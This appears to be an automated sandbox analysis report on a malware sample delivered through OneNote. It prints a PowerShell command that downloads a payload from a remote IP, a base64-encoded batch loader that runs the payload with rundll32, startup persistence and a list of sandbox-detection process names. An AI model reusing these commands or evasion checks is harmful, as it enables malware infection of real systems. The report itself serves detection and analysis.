Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (new-object system.net.webclient).downloadfile('http://87.236.146.31/38199.dat', 'C:\programdata\gb.jpg');
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe $atKUf9 = '62889e73828c756c961c5a6d6c01a463'; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('DQpAZWNobyBvZmYNCnNldCBhMXlKRFJMUT1heHZnc0sNCnNldCBhTFF1Q1J5NT1hSG5CZFVNMg0Kc2V0IGFGZGl6SWtEdD1hYlBTNXENCnBvd2Vyc2hlbGwgKG5ldy1vYmplY3Qgc3lzdGVtLm5ldC53ZWJjbGllbnQpLmRvd25sb2FkZmlsZSgnaHR0cDovLzg3LjIzNi4xNDYuMzEvMzgxOTkuZGF0JywgJ0M6XHByb2dyYW1kYXRhXGdiLmpwZycpOw0Kc2V0IGFnTWFlM3BDPWF5YXUzDQpzZXQgYW1QdFVNY0E9YVJaamUNCmNhbGwgcnUlMWxsMzIgQzpccHJvZ3JhbWRhdGFcZ2IuanBnLFdpbmQNCmV4aXQNCg==')) Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (new-object system.net.webclient).downloadfile('http://87.236.146.31/38199.dat', 'C:\programdata\gb.jpg'); Jump to behavior
PE file contains sections with non-standard names
Source: e77242d6.dll.15.dr Static PE information: section name: RT
Source: e77242d6.dll.15.dr Static PE information: section name: .mrdata
Source: e77242d6.dll.15.dr Static PE information: section name: .00cfg
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_1000970D LoadLibraryA,GetProcAddress, 15_2_1000970D
PE file contains an invalid checksum
Source: gb.jpg.13.dr Static PE information: real checksum: 0x76d79 should be: 0xb481
Binary contains a suspicious time stamp
Source: e77242d6.dll.15.dr Static PE information: 0x8A32A22A [Mon Jun 22 08:22:02 2043 UTC]
Source: initial sample Static PE information: section name: .text entropy: 6.845118704586284

Persistence and Installation Behavior
barindex
Tries to download and execute files (via powershell)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (new-object system.net.webclient).downloadfile('http://87.236.146.31/38199.dat', 'C:\programdata\gb.jpg');
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (new-object system.net.webclient).downloadfile('http://87.236.146.31/38199.dat', 'C:\programdata\gb.jpg'); Jump to behavior
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\ProgramData\gb.jpg Jump to dropped file
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\ProgramData\gb.jpg Jump to dropped file
Drops PE files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\ProgramData\gb.jpg Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\e77242d6.dll Jump to dropped file
Stores files to the Windows start menu directory
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnk Jump to behavior
Creates a start menu entry (Start Menu\Programs\Startup)
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnk Jump to behavior

Hooking and other Techniques for Hiding and Protection
barindex
DLL reload attack detected
Source: C:\Windows\SysWOW64\rundll32.exe Module Loaded: Original DLL: C:\USERS\user\APPDATA\LOCAL\TEMP\E77242D6.DLL reload: C:\WINDOWS\SYSWOW64\NTDLL.DLL
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 3124 base: E61790 value: E9 2E FE 92 FF Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Renames NTDLL to bypass HIPS
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\ntdll.dll Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\ntdll.dll Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: backgroundTaskHost.exe, 00000010.00000003.2823866326.00000000047B4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCMON.EXE
Source: backgroundTaskHost.exe, 00000010.00000003.2823866326.00000000047B4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: FRIDA-WINJECTOR-HELPER-32.EXE
Source: backgroundTaskHost.exe, 00000010.00000003.2823866326.00000000047B4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: WINDUMP.EXE!
Source: backgroundTaskHost.exe, 00000010.00000003.2823866326.00000000047B4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: IMPORTREC.EXE(
Source: backgroundTaskHost.exe, 00000010.00000003.2823866326.00000000047B4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: FRIDA-WINJECTOR-HELPER-64.EXE
Source: backgroundTaskHost.exe, 00000010.00000003.2823866326.00000000047B4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SNIFF_HIT.EXED
Source: backgroundTaskHost.exe, 00000010.00000003.2823866326.00000000047B4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: IMPORTREC.EXE
Source: backgroundTaskHost.exe, 00000010.00000003.2823866326.00000000047B4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PETOOLS.EXE
Source: backgroundTaskHost.exe, 00000010.00000003.2789778162.0000000004677000.00000004.00000020.00020000.00000000.sdmp, backgroundTaskHost.exe, 00000010.00000003.2822824712.0000000004677000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROC_ANALYZER.EXE
Source: backgroundTaskHost.exe, 00000010.00000003.2823866326.00000000047B4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: WINDUMP.EXE
Source: backgroundTaskHost.exe, 00000010.00000003.2823866326.00000000047B4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SNIFF_HIT.EXE
Source: backgroundTaskHost.exe, 00000010.00000003.2823866326.00000000047B4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: TCPDUMP.EXE
Source: backgroundTaskHost.exe, 00000010.00000003.2823866326.00000000047B4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SNIFF_HIT.EXE
Source: backgroundTaskHost.exe, 00000010.00000003.2823866326.00000000047B4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SYSANALYZER.EXE
Source: backgroundTaskHost.exe, 00000010.00000003.2823866326.00000000047B4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: DUMPCAP.EXE
Source: backgroundTaskHost.exe, 00000010.00000003.2823866326.00000000047B4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: WIRESHARK.EXE
Source: backgroundTaskHost.exe, 00000010.00000003.2823866326.00000000047B4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: FILEMON.EXE
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5028 Thread sleep count: 7177 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7156 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4120 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3360 Thread sleep count: 8451 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7548 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 3324 Thread sleep count: 133 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe TID: 2156 Thread sleep time: -156000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe TID: 4572 Thread sleep time: -60000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe Last function: Thread delayed
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
